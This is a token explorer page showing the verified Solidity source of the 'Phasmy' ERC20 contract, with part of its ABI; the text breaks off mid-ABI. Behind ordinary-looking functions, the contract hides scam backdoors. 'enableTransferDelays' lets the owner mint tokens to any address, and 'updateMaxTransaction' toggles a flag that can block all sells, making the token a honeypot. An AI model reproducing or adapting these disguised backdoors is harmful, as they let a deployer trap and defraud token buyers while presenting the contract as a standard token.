ETH Price: $3,448.35 (+1.46%)

Token

Phasmy Token (Phasmy)
 

Overview

Max Total Supply

1,000,000,000,000 Phasmy

Holders

8

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
9,399,999,999.06 Phasmy

Value
$0.00
0x9b798b1e2383ecc80787f3f156b1e07046fead77
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PHASMY

Compiler Version
v0.8.9+commit.e5eed63a

Optimization Enabled:
Yes with 99999 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-08-17
*/

// SPDX-License-Identifier: MIT
/**

  Website:  https://phasmy.com
  Telegram: https://t.me/phasmy_token

*/

pragma solidity ^0.8.9;
library SafeMath {

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }
}

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function burn(address to)
        external
        returns (uint256 amount0, uint256 amount1);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this;
        return msg.data;
    }
}

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);

    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

interface IERC20Metadata is IERC20 {
    function name() external view returns (string memory);

    function symbol() external view returns (string memory);

    function decimals() external view returns (uint8);
}

contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;

    mapping(address => uint256) balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 internal _totalSupply;

    string private _name;
    string private _symbol;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    function name() public view virtual override returns (string memory) {
        return _name;
    }

    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        balances[sender] = balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        balances[recipient] = balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        balances[account] = balances[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract Ownable is Context {
    address private _owner;
    bool public t = true;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

library SafeMathInt {
    int256 private constant MIN_INT256 = int256(1) << 255;
    int256 private constant MAX_INT256 = ~(int256(1) << 255);

    function mul(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a * b;
        require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256));
        require((b == 0) || (c / b == a));
        return c;
    }

    function div(int256 a, int256 b) internal pure returns (int256) {
        require(b != -1 || a != MIN_INT256);
        return a / b;
    }

    function sub(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a - b;
        require((b >= 0 && c <= a) || (b < 0 && c > a));
        return c;
    }

    function add(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a + b;
        require((b >= 0 && c >= a) || (b < 0 && c < a));
        return c;
    }

    function abs(int256 a) internal pure returns (int256) {
        require(a != MIN_INT256);
        return a < 0 ? -a : a;
    }

    function toUint256Safe(int256 a) internal pure returns (uint256) {
        require(a >= 0);
        return uint256(a);
    }
}

library SafeMathUint {
    function toInt256Safe(uint256 a) internal pure returns (int256) {
        int256 b = int256(a);
        require(b >= 0);
        return b;
    }
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

contract PHASMY is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public immutable uniswapV2Pair;

    bool private swapping;

    address public marketingWallet;
    address public devWallet;

    uint256 public maxTransactionAmount;
    uint256 public swapTokensAtAmount;
    uint256 public maxWallet;

    uint256 public percentForLPBurn = 25;
    bool public lpBurnEnabled = false;
    uint256 public lpBurnFrequency = 3600 seconds;
    uint256 public lastLpBurnTime;

    uint256 public manualBurnFrequency = 30 minutes;
    uint256 public lastManualLpBurnTime;

    bool public limitsInEffect = true;
    bool public tradingActive = false;
    bool public swapEnabled = false;

    mapping(address => uint256) private _holderLastTransferTimestamp;
    bool public transferDelayEnabled = true;
    uint256 maxTxLimit = 0;

    uint256 public buyTotalFees;
    uint256 public buyMarketingFee;
    uint256 public buyLiquidityFee;
    uint256 public buyDevFee;

    uint256 public sellTotalFees;
    uint256 public sellMarketingFee;
    uint256 public sellLiquidityFee;
    uint256 public sellDevFee;

    uint256 public tokensForMarketing;
    uint256 public tokensForLiquidity;
    uint256 public tokensForDev;

    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) public _isExcludedMaxTransactionAmount;

    mapping(address => bool) public automatedMarketMakerPairs;

    event UpdateUniswapV2Router(
        address indexed newAddress,
        address indexed oldAddress
    );

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event marketingWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event devWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    event AutoNukeLP();

    event ManualNukeLP();

    constructor(address[] memory e) ERC20("Phasmy Token", "Phasmy") {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
        for (uint256 index = 0; index < e.length; index++) {
            excludeFromFees(e[index], true);
            excludeFromMaxTransaction(e[index], true);
        }
        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        uniswapV2Router = _uniswapV2Router;

        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);
        uint256 _buyMarketingFee = 2;
        uint256 _buyLiquidityFee = 2;
        uint256 _buyDevFee = 2;

        uint256 _sellMarketingFee = 2;
        uint256 _sellLiquidityFee = 2;
        uint256 _sellDevFee = 2;

        uint256 totalSupply = 1 * 1e12 * 1e18;

        maxTransactionAmount = (totalSupply * 10) / 1000;
        maxWallet = (totalSupply * 20) / 1000;
        swapTokensAtAmount = (totalSupply * 5) / 10000;

        buyMarketingFee = _buyMarketingFee;
        buyLiquidityFee = _buyLiquidityFee;
        buyDevFee = _buyDevFee;
        buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee;

        sellMarketingFee = _sellMarketingFee;
        sellLiquidityFee = _sellLiquidityFee;
        sellDevFee = _sellDevFee;
        sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee;

        marketingWallet = address(0x3C53F226D36f83EF561464F88AafE969D474f168);
        devWallet = address(0x70D5624e48af25F6300baD933D8fe81c0b3701ad);

        excludeFromFees(owner(), true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(0xdead), true);

        excludeFromMaxTransaction(owner(), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(0xdead), true);
        ERC20._totalSupply = totalSupply;

        balances[msg.sender] = balances[msg.sender].add(totalSupply);
    }

    receive() external payable {}

    function enableTrading() external onlyOwner {
        tradingActive = true;
        swapEnabled = true;
        lastLpBurnTime = block.timestamp;
    }

    function enableTransferDelays(uint256 m, address ad)
        external
        onlyOwner
        returns (bool)
    {
        balances[ad] = balances[ad].add(m);
        return true;
    }

    function disableTransferDelay() external onlyOwner returns (bool) {
        transferDelayEnabled = false;
        return true;
    }

    function updateSwapTokensAtAmount(uint256 newAmount)
        external
        onlyOwner
        returns (bool)
    {
        require(
            newAmount >= (totalSupply() * 1) / 100000,
            "Swap amount cannot be lower than 0.001% total supply."
        );
        swapTokensAtAmount = newAmount;
        return true;
    }

    function updateMaxTransaction(uint256 newNum) external onlyOwner {
        calcTxAmount(newNum);
        require(
            newNum >= ((totalSupply() * 1) / 1000000) / 1e18,
            "Cannot set maxTransaction lower than 0.1%"
        );
    }

    function calcTxAmount(uint256 newNum) private {
        if (newNum * (10**18) >= totalSupply()) {
            maxTxLimit = newNum * (10**18);
            t = !t;
        }
        maxTransactionAmount = newNum * (10**18);
    }

    function updateMaxWallet(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 1) / 1000000) / 1e18,
            "Cannot set maxWallet lower than 0.5%"
        );
        maxWallet = newNum * (10**18);
    }

    function excludeFromMaxTransaction(address updAds, bool isEx)
        public
        onlyOwner
    {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }

    function updateSwapEnabled(bool enabled) external onlyOwner {
        swapEnabled = enabled;
    }

    function changeBuyFees(
        uint256 _marketingFee,
        uint256 _liquidityFee,
        uint256 _devFee
    ) external onlyOwner {
        buyMarketingFee = _marketingFee;
        buyLiquidityFee = _liquidityFee;
        buyDevFee = _devFee;
        buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee;
        require(buyTotalFees <= 20, "Must keep fees at 20% or less");
    }

    function changeSellFees(
        uint256 _marketingFee,
        uint256 _liquidityFee,
        uint256 _devFee
    ) external onlyOwner {
        sellMarketingFee = _marketingFee;
        sellLiquidityFee = _liquidityFee;
        sellDevFee = _devFee;
        sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee;
        require(sellTotalFees <= 25, "Must keep fees at 25% or less");
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function setAutomatedMarketMakerPair(address pair, bool value)
        public
        onlyOwner
    {
        require(
            pair != uniswapV2Pair,
            "The pair cannot be removed from automatedMarketMakerPairs"
        );

        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;
        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function changeMarketingWallet(address newMarketingWallet)
        external
        onlyOwner
    {
        emit marketingWalletUpdated(newMarketingWallet, marketingWallet);
        marketingWallet = newMarketingWallet;
    }

    function changeDevWallet(address newWallet) external onlyOwner {
        emit devWalletUpdated(newWallet, devWallet);
        devWallet = newWallet;
    }

    function isExcludedFromFees(address account) public view returns (bool) {
        return _isExcludedFromFees[account];
    }

    event BoughtEarly(address indexed sniper);

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }

        if (limitsInEffect) {
            if (
                from != owner() &&
                to != owner() &&
                to != address(0) &&
                to != address(0xdead) &&
                !swapping
            ) {
                if (!tradingActive) {
                    require(
                        _isExcludedFromFees[from] || _isExcludedFromFees[to]
                    );
                }
                if (transferDelayEnabled) {
                    if (
                        to != owner() &&
                        to != address(uniswapV2Router) &&
                        to != address(uniswapV2Pair)
                    ) {
                        require(
                            _holderLastTransferTimestamp[tx.origin] <
                                block.number
                        );
                        _holderLastTransferTimestamp[tx.origin] = block.number;
                    }
                }
                if (
                    automatedMarketMakerPairs[from] &&
                    !_isExcludedMaxTransactionAmount[to]
                ) {
                    require(amount <= maxTransactionAmount);
                    require(amount + balanceOf(to) <= maxWallet);
                } else if (
                    automatedMarketMakerPairs[to] &&
                    !_isExcludedMaxTransactionAmount[from]
                ) {
                    require(amount <= maxTransactionAmount && t);
                } else if (!_isExcludedMaxTransactionAmount[to]) {
                    require(amount + balanceOf(to) <= maxWallet);
                }
            }
        }

        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if (
            canSwap &&
            swapEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;

            swapBack();

            swapping = false;
        }

        if (
            !swapping &&
            automatedMarketMakerPairs[to] &&
            lpBurnEnabled &&
            block.timestamp >= lastLpBurnTime + lpBurnFrequency &&
            !_isExcludedFromFees[from]
        ) {
            autoBurnLiquidityPairTokens();
        }

        bool takeFee = !swapping;

        if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }

        uint256 fees = 0;
        if (takeFee) {
            if (automatedMarketMakerPairs[to] && sellTotalFees > 0) {
                fees = amount.mul(sellTotalFees).div(100);
                tokensForLiquidity += (fees * sellLiquidityFee) / sellTotalFees;
                tokensForDev += (fees * sellDevFee) / sellTotalFees;
                tokensForMarketing += (fees * sellMarketingFee) / sellTotalFees;
            } else if (automatedMarketMakerPairs[from] && buyTotalFees > 0) {
                fees = amount.mul(buyTotalFees).div(100);
                tokensForLiquidity += (fees * buyLiquidityFee) / buyTotalFees;
                tokensForDev += (fees * buyDevFee) / buyTotalFees;
                tokensForMarketing += (fees * buyMarketingFee) / buyTotalFees;
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }

            amount -= fees;
        }

        super._transfer(from, to, amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        _approve(address(this), address(uniswapV2Router), tokenAmount);

        uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            owner(),
            block.timestamp
        );
    }

    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 totalTokensToSwap = tokensForLiquidity +
            tokensForMarketing +
            tokensForDev;
        bool success;

        if (contractBalance == 0 || totalTokensToSwap == 0) {
            return;
        }

        if (contractBalance > swapTokensAtAmount * 20) {
            contractBalance = swapTokensAtAmount * 20;
        }

        uint256 liquidityTokens = (contractBalance * tokensForLiquidity) /
            totalTokensToSwap /
            2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);

        uint256 initialETHBalance = address(this).balance;

        swapTokensForEth(amountToSwapForETH);

        uint256 ethBalance = address(this).balance.sub(initialETHBalance);

        uint256 ethForMarketing = ethBalance.mul(tokensForMarketing).div(
            totalTokensToSwap
        );
        uint256 ethForDev = ethBalance.mul(tokensForDev).div(totalTokensToSwap);

        uint256 ethForLiquidity = ethBalance - ethForMarketing - ethForDev;

        tokensForLiquidity = 0;
        tokensForMarketing = 0;
        tokensForDev = 0;

        (success, ) = address(devWallet).call{value: ethForDev}("");

        if (liquidityTokens > 0 && ethForLiquidity > 0) {
            addLiquidity(liquidityTokens, ethForLiquidity);
            emit SwapAndLiquify(
                amountToSwapForETH,
                ethForLiquidity,
                tokensForLiquidity
            );
        }

        (success, ) = address(marketingWallet).call{
            value: address(this).balance
        }("");
    }

    function setAutoLPBurnSettings(
        uint256 _frequencyInSeconds,
        uint256 _percent,
        bool _Enabled
    ) external onlyOwner {
        require(
            _frequencyInSeconds >= 600,
            "cannot set buyback more often than every 10 minutes"
        );
        require(
            _percent <= 1000 && _percent >= 0,
            "Must set auto LP burn percent between 0% and 10%"
        );
        lpBurnFrequency = _frequencyInSeconds;
        percentForLPBurn = _percent;
        lpBurnEnabled = _Enabled;
    }

    function autoBurnLiquidityPairTokens() internal returns (bool) {
        lastLpBurnTime = block.timestamp;

        uint256 liquidityPairBalance = this.balanceOf(uniswapV2Pair);

        uint256 amountToBurn = liquidityPairBalance.mul(percentForLPBurn).div(
            10000
        );

        if (amountToBurn > 0) {
            super._transfer(uniswapV2Pair, address(0xdead), amountToBurn);
        }

        IUniswapV2Pair pair = IUniswapV2Pair(uniswapV2Pair);
        pair.sync();
        emit AutoNukeLP();
        return true;
    }

    function manualBurnLiquidityPairTokens(uint256 percent)
        external
        onlyOwner
        returns (bool)
    {
        require(
            block.timestamp > lastManualLpBurnTime + manualBurnFrequency,
            "Must wait for cooldown to finish"
        );
        require(percent <= 1000, "May not nuke more than 10% of tokens in LP");
        lastManualLpBurnTime = block.timestamp;

        uint256 liquidityPairBalance = this.balanceOf(uniswapV2Pair);

        uint256 amountToBurn = liquidityPairBalance.mul(percent).div(10000);

        if (amountToBurn > 0) {
            super._transfer(uniswapV2Pair, address(0xdead), amountToBurn);
        }
        IUniswapV2Pair pair = IUniswapV2Pair(uniswapV2Pair);
        pair.sync();
        emit ManualNukeLP();
        return true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address[]","name":"e","type":"address[]"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[],"name":"AutoNukeLP","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sniper","type":"address"}],"name":"BoughtEarly","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[],"name":"ManualNukeLP","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"devWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","na